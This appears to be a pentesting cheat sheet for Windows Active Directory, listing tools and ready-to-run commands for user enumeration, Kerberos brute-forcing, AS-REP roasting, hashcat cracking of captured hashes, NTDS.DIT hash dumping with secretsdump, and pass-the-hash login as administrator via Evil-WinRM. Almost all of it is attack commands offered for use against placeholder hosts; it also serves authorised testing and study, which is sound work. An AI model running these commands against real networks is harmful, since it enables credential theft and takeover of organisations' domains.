While pentesting a Windows network some tools and essential to have handy:
- Enum4Linux – Quick enumeration.
- Kerbrute – Enumerate domain users.
- Impacket – Parsing SMB and NetBIOS packets.
- ASREPRoasting attack – Enumerating used with no password required.
- HashCat – Cracking Kerberos hashes.
- SecretDump – Dumping NTDS.DIT hashes.
- ASREPRoasting attack – Enumerating used with no password required.
- Evil-WinRM – Logging in passing hash (no password).
- SMBclient – Enumerating shares.
Quick enumeration Users, Groups, Shares… with Enum4Linux [Link]:
/usr/share/enum4linux/enum4linux.pl -a 10.10.10.10 nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Kerbrute – Brute forces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication [Link].
There is also a short-handed repository for it that I recommend using:
git clone https://github.com/Sq00ky/attacktive-directory-tools.git cd attacktive-directory-tools && chmod +x kerbrute ./kerbrute userenum --dc 10.10.10.10 -d domain.local user.lst
Installing Impacket – Tool able to parse packets from low to high-level protocols, excellent for SMB and NetBIOS analysis:
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket sudo pip3 install -r /opt/impacket/requirements.txt cd /opt/impacket/ sudo python3 ./setup.py install
ASREPRoasting attack using Impacket – Looks for users that are set to do not require pre-auth:
python3 /opt/impacket/examples/GetNPUsers.py domain.local/admin -request -no-pass -dc-ip 10.10.10.10
Cracking Kerberos hashes obtained from the ASREPRoasting attack:
hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt
Enumerating shares for a particular user – Knowing the password is required!
smbclient -U domain.local/admin -L //10.10.10.10 smbclient -U domain.local/admin //10.10.10.10/share get file.txt smbget -R smb://10.10.10.10/share
Dumping all NTDS.DIT hashes with Impacket:
python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.10.10 domain.local/share:[email protected]
Authenticating by passing a dumped hash (no password required using Evil-WinRM:
sudo gem install evil-winrm evil-winrm -i 10.10.10.10 -u administrator -H 5f4dcc3b5aa765d61d8327deb882cf99